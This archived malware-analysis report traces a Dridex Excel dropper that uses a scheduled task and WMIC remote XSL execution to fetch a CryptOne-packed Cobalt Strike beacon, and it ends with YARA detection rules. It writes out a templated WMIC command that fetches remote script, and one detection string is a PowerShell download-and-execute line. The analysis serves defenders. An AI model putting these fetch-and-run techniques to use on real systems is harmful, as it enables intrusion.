{ "id": "fbbad598-d8fb-4aa3-9a0a-bc8e34cd7f2d", "created_at": "2026-04-06T00:08:55.095726Z", "updated_at": "2026-04-10T13:12:16.574526Z", "deleted_at": null, "sha1_hash": "395e66c042c24d580e10e4a8713b3361b7bd32b9", "title": "Dridex Document to Cobalt Strike – Malware Book Reports", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 95394, "plain_text": "Dridex Document to Cobalt Strike – Malware Book Reports\r\nBy muzi View all posts\r\nArchived: 2026-04-05 19:37:51 UTC\r\nOn June 30th, Dridex Excel documents were observed downloading Cobalt Strike packed with the CryptOne\r\npacker – skipping the typical in-between step of downloading Dridex.\r\nFilename: attachment_filenameUTF-8WO202825876.xlsb\r\nMD5: 56d9a0db8defe0857dd4bb7c9af97ee2\r\nSHA1: abf0d796220d5e8ba7a5cc3f5ed2421411a5fb56\r\nSHA256: a0747e6e54af1fde0586add639282d26b5e22a0bb4e4cca5d362c6eb6f6f3ed4\r\nExcel Document Dropper\r\nFigure 1: Excel Document Dropper\r\nThe Dridex document dropper was delivered via an xlsb attachment. When opened, it displays the above image,\r\nclaiming that the document is encrypted and protected by GlobalSign® and prompts the user to ‘Enable Content’\r\nto run malicious VBA macros.\r\nUnlike many maldocs, the VBA contained in this Excel document is fairly straightforward. The VBA creates a\r\nscheduled task which executes 68 seconds from the time of running. The contents of the scheduled task are stored\r\nin the cells of the GlocalSign Protected sheet, which is the sheet that is displayed when the document is opened.\r\nThe data in cell range BG63:EL175 are combined to form the scheduled task, stored in the xAccounting3\r\nvariable. Next, the time is added to the scheduled task and then stored in the variable xWKS .\r\nFigure 2: VBA Macro\r\nThe author was also nice enough to include the Debug.Print xWKs statement, which prints out the scheduled task\r\nthat is created. The scheduled task abuses a living off the land technique called WMIC Remote XSL JScript\r\nExecution.\r\nFigure 3: Scheduled Task Created by VBA Macro\r\nXSL Second Stage\r\nFilename: FNzCMeQWqRMmewW.xsl\r\nMD5: a5c64d06c553216741e1441a26a9f44b\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 1 of 9\n\nSHA-1: 218bd229168f6da1821128548a455798b77089ff\r\nSHA-256: 09ffc962612f1d28e72b59b9a2c7c8f24aa058a3198c80a9d3180445870c3e88\r\nThe next stage, an XSL file, is executed via the command wmic os get /format:\\\"\u003clink_to_malicious_xsl\u003e\"\r\nfrom the scheduled task previously mentioned. The XSL file contains multiple blocks of JScript which are\r\nobfuscated. These code blocks, while obfuscated, give away some hints that allow for an educated guess as to\r\nwhat the goal of the code is.\r\nFigure 4: Snippet of XSL File Containing JScript\r\nFigure 5: Snippet of XSL File Containing PowerShell Command\r\nBased on the code snippets above, it can be inferred that the main goal of the included JScript inside the XSL file\r\nis to download and execute a payload from one of the URLs in the array zyalpyuauvojieqf using PowerShell.\r\nOnce this obfuscated code is deobfuscated/cleaned up, it is very straightforward. The code downloads and\r\nexecutes a payload from the current User’s %APPDATA% directory.\r\nFigure 6: Deobfuscated/cleaned XSL File\r\nThird Stage: Dridex… Wait, Actually Cobalt Strike\r\nFilename: 5H99AkSE5ER.php\r\nMD5: 2680d519097273ace671daf7ac0f9e8d\r\nSHA1: 6af97623ce61dee9f2d6331eb113e2c16831d00f\r\nSHA256: c5b39009be422e89c793241831efd12c6827de20a56b71783d4fd80db9409910\r\nOver the last couple of weeks, the Excel maldoc above has been observed delivering Dridex as the third stage\r\npayload. In this case, it appears that rather than download Dridex, the actors behind this campaign (TA575, which\r\nruns botnet 22201) have decided to go straight to dropping Cobalt Strike. This decision was likely made in order\r\nto get initial access into the hands of ransomware groups even faster.\r\nWhen opened in PE studio, this executable appears to be packed. There are a few extra PE sections, entropy is\r\nrelatively high at 7.096 and the strings don’t provide much information. Diving into Ghidra and the disassembled\r\ncode, one routine in particular stood out:\r\nFigure 7: CryptOne Packer Killswitch (RegKey Check)\r\nThe CryptOne packer is a software crypter that has previously been observed being used by Wastedlocker,\r\nNetwalker, Gozi ISFB v3, ZLoader and Smokeloader. The Emotet group has also used this packer previously. The\r\nfollowing article provides a wealth of information surrounding this CryptOne packer and is an excellent resource\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 2 of 9\n\nthat was used during the analysis of this malware: https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/. According to the article from deepinstinct/Ron Ben Yizhak:\r\nThe unpacking process is composed of two stages until the destined malware is executed. The first\r\nstage is the DLL that is created by the packing software. This DLL contains encrypted data in one of its\r\nsections, which is copied to a RWX buffer and then decrypted. This data contains a shellcode and\r\nanother block of encrypted data.\r\nRon Ben Yizhak\r\nCryptOne first decrypted and executed an embedded exe and transferred execution to that executable.\r\nFigure 8: Decrypted Loader within CryptOne packed executable\r\nNext, after execution is transferred to the decrypted loader, RWX memory is allocated and another executable is\r\nwritten to that allocated memory. Notice the file starts with 4D5A (MZ) but is followed with 5245 (RE). MZRE\r\nand MZAR are indicators of Cobalt Strike Magic MZ, which overrides the first bytes in order to execute shellcode\r\nwhich jumps to or executes its export function, ReflectiveLoader@4 .\r\nFigure 9: DLL by loader (Hint: MZRE –\u003e Beacon Magic MZ)\r\nFinally, after the DLL is written, it is executed via CreateRemoteThread, where the shellcode in the header calls\r\nthe ReflectiveLoader@4 function.\r\nFigure 10: ReflectiveLoader Export\r\nAfter dumping the DLL and loading into PE studio, there is additional evidence as to what the final payload is.\r\nFigure 11: Dump DLL using ProcessHacker\r\nFigure 12: PE Studio Detects beacon.dll as Original Filename\r\nCobalt Strike Config\r\nNow that the final payload has been identified as Cobalt Strike, the last step of analysis is to extract the\r\nconfiguration of the beacon payload. There are a variety of ways to do this:\r\nDebugging\r\nSandboxing in a tool such as tria.ge\r\nSentinelOne’s CobaltStrikeParser\r\nFor the sake of simplicity, SentinelOne’s CobaltStrikeParser was used to extract the Beacon config.\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 3 of 9\n\nFigure 13: Cobalt Strike Config\r\nDetection\r\nCryptOne Packer Yara Rule\r\nrule CryptOne_Packer {\r\n \r\nmeta:\r\n author = \"muzi\"\r\n date = \"06/30/2021\"\r\n description = \"Detects CryptOne packer. Typically used to crypt Cobalt Strike, Gozi ISFB, Zloader and Sm\r\n references = \"https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/\"\r\n strings:\r\n /*\r\n Packer makes cmp dword to 0 several times for no reason, then jumps\r\n 0044D417 | 833D 88384500 00 | cmp dword ptr ds:[453888],0 |\r\n 0044D41E | 74 05 | je 5h99akse5er.44D425 |\r\n 0044D420 | E8 ABFFFFFF | call 5h99akse5er.44D3D0 |\r\n 0044D425 | 833D 88384500 00 | cmp dword ptr ds:[453888],0 |\r\n 0044D42C | 74 05 | je 5h99akse5er.44D433 |\r\n 0044D42E | E8 2DFEFFFF | call 5h99akse5er.44D260 |\r\n 0044D433 | 833D 88384500 00 | cmp dword ptr ds:[453888],0 |\r\n 0044D43A | 74 05 | je 5h99akse5er.44D441 |\r\n 0044D43C | E8 8FFFFFFF | call 5h99akse5er.44D3D0 |\r\n 0044D441 | 833D 88384500 00 | cmp dword ptr ds:[453888],0 |\r\n 0044D448 | 74 05 | je 5h99akse5er.44D44F |\r\n 0044D44A | E8 11FEFFFF | call 5h99akse5er.44D260 |\r\n 0044D44F | 833D 88384500 00 | cmp dword ptr ds:[453888],0 |\r\n 0044D456 | 74 05 | je 5h99akse5er.44D45D |\r\n 0044D458 | E8 03FEFFFF | call 5h99akse5er.44D260 |\r\n 0044D45D | 833D 88384500 00 | cmp dword ptr ds:[453888],0 |\r\n 0044D464 | 74 0F | je 5h99akse5er.44D475 |\r\n */\r\n $worthless_cmp = {\r\n 83 3D ?? ?? ?? 00 00 [0-8] // cmp dword \u003cdword ptr\u003e\r\n 74 ?? [0-8] // je \u003caddress\u003e\r\n (E8|FF) ?? ?? ?? ?? [0-8] // call \u003cfunction\u003e\r\n 83 3D ?? ?? ?? 00 00 // cmp dword \u003cdword ptr\u003e\r\n }\r\n /*\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 4 of 9\n\n0044d1c4 ff 15 4c CALL dword ptr [-\u003eKERNEL32.DLL::GetLastError]\r\n 26 45 00\r\n 0044d1ca 83 f8 06 CMP EAX,0x6\r\n 0044d1cd 74 04 JZ LAB_0044d1d3\r\n 0044d1cf 33 c0 XOR EAX,EAX\r\n LAB_0044d1d3 XREF[1]: 0044d1cd(j)\r\n 0044d1d3 68 bc 38 PUSH DAT_004538bc\r\n 45 00\r\n 0044d1d8 8b 45 f8 MOV EAX,dword ptr [EBP + local_c]\r\n 0044d1db 50 PUSH EAX=\u003eDAT_004521b4 = 35h\r\n 0044d1dc 8b 0d 34 MOV ECX,dword ptr [DAT_00452134] = 80000020h\r\n 21 45 00\r\n 0044d1e2 83 e9 20 SUB ECX,0x20\r\n 0044d1e5 51 PUSH ECX\r\n 0044d1e6 ff 15 44 CALL dword ptr [-\u003eADVAPI32.DLL::RegOpenKeyA]\r\n 29 45 00\r\n 0044d1ec 89 45 fc MOV dword ptr [EBP + local_8],EAX\r\n 0044d1ef 83 7d fc 00 CMP dword ptr [EBP + local_8],0x0\r\n 0044d1f3 74 0b JZ LAB_0044d200\r\n LAB_0044d1f5 XREF[1]: 0044d1fe(j)\r\n 0044d1f5 ba 01 00 MOV EDX,0x1\r\n 00 00\r\n 0044d1fa 85 d2 TEST EDX,EDX\r\n 0044d1fc 74 02 JZ LAB_0044d200\r\n 0044d1fe eb f5 JMP LAB_0044d1f5\r\n */\r\n $reg_key_check = {\r\n (FF|E8) ?? ?? ?? ?? ?? // CALL dword ptr [-\u003eKE\r\n (83|93|A3|B3|C3|D3) (F8|F9|FA|FB|FC|FD|FE|FF) 06 [0-64] // CMP \u003creg\u003e 6\r\n 68 ?? ?? ?? ?? [0-8] // PUSH data\r\n (88|89|8A|8B|8C) (45|4D|55|5D|6D|75|7D) (F?|E?|D?|C?|B?|A?) [0-8] // MOV \u003creg\u003e, [ebp + of\r\n 5? [0-8] // PUSH \u003creg\u003e\r\n (88|89|8A|8B|8C) (0d|15|1d|25|2d|35|3d) ?? ?? ?? ?? [0-24] // MOV \u003creg\u003e dword\r\n ff ?? ?? ?? ?? ?? [0-8] // CALL dword ptr [-\u003eAD\r\n (88|89|8A|8B|8C) 45 (F8|F9|FA|FB|FC|FD|FE|FF) [0-8] // MOV [EBP + local_8],\r\n 83 (78|79|7A|7B|7D|7E|7F) (F8|F9|FA|FB|FC|FD|FE|FF) 00 [0-8] // CMP dword ptr [EBP +\r\n (E2|EB|72|74|75|7C) ?? [0-64] // Conditional JMP (Hea\r\n (B8|B9|BA|BB|BD|BE|BF) 01 00 00 00 [0-8] // MOV \u003creg\u003e, 0x1\r\n (84|85) (D0|D1|D2|D3|D5|D6|D7) [0-8] // TEST \u003creg\u003e,\u003creg\u003e\r\n (E2|EB|72|74|75|7C) ?? [0-8] // Loop/Conditional JMP\r\n (E2|EB|72|74|75|7C) ?? // Loop/Conditional JMP\r\n }\r\n /*\r\n 00401e6f 81 ea ad SUB EDX,0xcad\r\n 0c 00 00\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 5 of 9\n\n00401e75 52 PUSH EDX\r\n 00401e76 ff 15 5c CALL dword ptr [DAT_004eb45c]\r\n b4 4e 00\r\n 00401e7c 89 45 fc MOV dword ptr [EBP + local_8],EAX\r\n 00401e7f 83 7d fc 00 CMP dword ptr [EBP + local_8],0x0\r\n 00401e83 74 0b JZ LAB_00401e90\r\n LAB_00401e85 XREF[1]: 00401e8e(j)\r\n 00401e85 b8 01 00 MOV EAX,0x1\r\n 00 00\r\n 00401e8a 85 c0 TEST EAX,EAX\r\n 00401e8c 74 02 JZ LAB_00401e90\r\n 00401e8e eb f5 JMP LAB_00401e85\r\n LAB_00401e90 XREF[2]: 00401e83(j), 00401e8c(\r\n 00401e90 e8 0b f4 CALL FUN_004012a0 undefined * FUN_004\r\n ff ff\r\n 00401e95 a3 78 a1 MOV [DAT_004ea178],EAX = 00000042h\r\n 4e 00\r\n 00401e9a 8b e5 MOV ESP,EBP\r\n 00401e9c 5d POP EBP\r\n 00401e9d c3 RET\r\n */\r\n $reg_key_check_2 = {\r\n (80|81|82|83) ?? ?? ?? ?? ?? [0-8] // SUB\r\n (50|51|52|53|55|56|57) [0-8] // PUS\r\n ff ?? ?? ?? ?? ?? [0-8] // CAL\r\n (88|89|8A|8B|8C) 45 (F8|F9|FA|FB|FC|FD|FE|FF) [0-8] // MOV\r\n (83|93|A3|B3|C3|D3) (78|79|7A|7B|7D|7E|7F) (F8|F9|FA|FB|FC|FD|FE|FF) 00 [0-8] // CMP\r\n (E2|EB|72|74|75|7C) ?? [0-8] // Con\r\n (B8|B9|BA|BB|BD|BE|BF) 01 00 00 00 [0-8] // MOV\r\n (84|85) (C0|C1|C2|C3|C4|C5|C6|C7) [0-8] // TES\r\n (E2|EB|72|74|75|7C) ?? [0-8] // Con\r\n (E2|EB|72|74|75|7C) ?? // Inf\r\n }\r\n /*\r\n 00402d35 50 PUSH EAX=\u003eu_aaaerfacE\\{b196b287-bab4-101a-b6_00527800 = u\"aaaerfacE\\\\{b19\r\n 00402d36 8b 0d fc MOV ECX,dword ptr [DAT_005277fc] = 80000002h\r\n 77 52 00\r\n 00402d3c 83 e9 02 SUB ECX,0x2\r\n 00402d3f 51 PUSH ECX\r\n 00402d40 ff 55 f8 CALL dword ptr [EBP + local_c]\r\n 00402d43 89 45 fc MOV dword ptr [EBP + local_8],EAX\r\n 00402d46 83 7d fc 00 CMP dword ptr [EBP + local_8],0x0\r\n 00402d4a 74 0b JZ LAB_00402d57\r\n LAB_00402d4c XREF[1]: 00402d55(j)\r\n 00402d4c ba 01 00 MOV EDX,0x1\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 6 of 9\n\n00 00\r\n 00402d51 85 d2 TEST EDX,EDX\r\n 00402d53 74 02 JZ LAB_00402d57\r\n 00402d55 eb f5 JMP LAB_00402d4c\r\n */\r\n $reg_key_check_3 = {\r\n (50|51|52|53|55|56|57) [0-8] // PUS\r\n (88|89|8A|8B|8C) (0d|15|1d|25|2d|35|3d) ?? ?? ?? ?? [0-8] // MOV\r\n (80|81|82|83) ?? ?? [0-8] // SUB\r\n (50|51|52|53|55|56|57) [0-8] // PUS\r\n ff ?? ?? [0-8] // CAL\r\n (88|89|8A|8B|8C) 45 (F8|F9|FA|FB|FC|FD|FE|FF) [0-8] // MOV\r\n (83|93|A3|B3|C3|D3) (78|79|7A|7B|7D|7E|7F) (F8|F9|FA|FB|FC|FD|FE|FF) 00 [0-8] // CMP\r\n (E2|EB|72|74|75|7C) ?? [0-8] // Con\r\n (B8|B9|BA|BB|BD|BE|BF) 01 00 00 00 [0-8] // MOV\r\n (84|85) (D0|D1|D2|D3|D4|D5|D6|D7) [0-8] // TES\r\n (E2|EB|72|74|75|7C) ?? [0-8] // Con\r\n (E2|EB|72|74|75|7C) ?? // Inf\r\n }\r\n /*\r\n Infinite Loop Check - Malware always checks for a certain reg key and if it doesn't exist, it will loop\r\n */\r\n $inf_loop_eax = {B8 01 00 00 00\r\n 85 C0\r\n 7? 0?\r\n EB F?}\r\n $inf_loop_ecx = {B9 01 00 00 00\r\n 85 C9\r\n 7? 0?\r\n EB F?}\r\n $inf_loop_edx = {BA 01 00 00 00\r\n 85 CA\r\n 7? 0?\r\n EB F?}\r\n $inf_loop_ebx = {BB 01 00 00 00\r\n 85 CB\r\n 7? 0?\r\n EB F?}\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 7 of 9\n\n$inf_loop_ebp = {BD 01 00 00 00\r\n 85 CD\r\n 7? 0?\r\n EB F?}\r\n $inf_loop_esi = {BE 01 00 00 00\r\n 85 CE\r\n 7? 0?\r\n EB F?}\r\n $inf_loop_edi = {BF 01 00 00 00\r\n 85 CF\r\n 7? 0?\r\n EB F?}\r\n condition:\r\n (#worthless_cmp \u003e= 3 and ($reg_key_check or $reg_key_check_2 or $reg_key_check_3)) or\r\n $reg_key_check_3 or\r\n any of ($inf_loop_*)\r\n}\r\nCobalt Strike Beacon Yara Rule\r\nrule Cobalt_Strike_Beacon {\r\n meta:\r\n author = \"muzi\"\r\n date = \"2021-07-04\"\r\n strings:\r\n $s1 = \"MZRE\"\r\n $s2 = \"MZAR\"\r\n $s3 = \"could not run command (w/ token) because of its length of %d bytes!\"\r\n $s4 = \"could not spawn %s (token): %d\"\r\n $s5 = \"could not spawn %s: %d\"\r\n $s6 = \"Could not open process token: %d (%u)\"\r\n $s7 = \"could not run %s as %s\\\\%s: %d\"\r\n $s8 = \"could not upload file: %d\"\r\n $s9 = \"could not open %s: %d\"\r\n $s10 = \"could not get file time: %d\"\r\n $s11 = \"could not set file time: %d\"\r\n $s12 = \"Could not connect to pipe (%s): %d\"\r\n $s13 = \"Could not open service control manager on %s: %d\"\r\n $s14 = \"Could not create service %s on %s: %d\"\r\n $s15 = \"Could not start service %s on %s: %d\"\r\n $s16 = \"Failed to impersonate token: %d\"\r\n $s17 = \"ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.\"\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 8 of 9\n\n$s18 = \"could not write to process memory: %d\"\r\n $s19 = \"could not create remote thread in %d: %d\"\r\n $s20 = \"%d is an x64 process (can't inject x86 content)\"\r\n $s21 = \"%d is an x86 process (can't inject x64 content)\"\r\n $s22 = \"Could not connect to pipe: %d\"\r\n $s23 = \"kerberos ticket use failed: %08x\"\r\n $s24 = \"could not connect to pipe: %d\"\r\n $s25 = \"Maximum links reached. Disconnect one\"\r\n $s26 = \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')\"\r\n $s27 = \"I'm already in SMB mode\"\r\n $s28 = \"Failed to duplicate primary token for %d (%u)\"\r\n $s29 = \"Failed to impersonate logged on user %d (%u)\"\r\n $s30 = \"LibTomMath\"\r\n $s31 = \"beacon.dll\"\r\n $s32 = \"ReflectiveLoader@4\"\r\n condition:\r\n 6 of them\r\n}\r\nCobalt Strike Magic MZ Yara Rule\r\nrule Cobalt_Strike_Magic_MZ {\r\n meta:\r\n author = \"muzi\"\r\n date = \"2021-07-04\"\r\n condition:\r\n uint32be(0) == 0x4D5A5245 or uint32be(0) == 0x4D5A4152\r\n}\r\nSource: https://malwarebookreports.com/cryptone-cobalt-strike/\r\nhttps://malwarebookreports.com/cryptone-cobalt-strike/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://malwarebookreports.com/cryptone-cobalt-strike/" ], "report_names": [ "cryptone-cobalt-strike" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7583fbd4-2bc9-458d-81da-50b27b84e136", "created_at": "2023-02-15T02:01:49.565258Z", "updated_at": "2026-04-10T02:00:03.349283Z", "deleted_at": null, "main_name": "TA575", "aliases": [], "source_name": "MISPGALAXY:TA575", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434135, "ts_updated_at": 1775826736, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/395e66c042c24d580e10e4a8713b3361b7bd32b9.pdf", "text": "https://archive.orkl.eu/395e66c042c24d580e10e4a8713b3361b7bd32b9.txt", "img": "https://archive.orkl.eu/395e66c042c24d580e10e4a8713b3361b7bd32b9.jpg" } }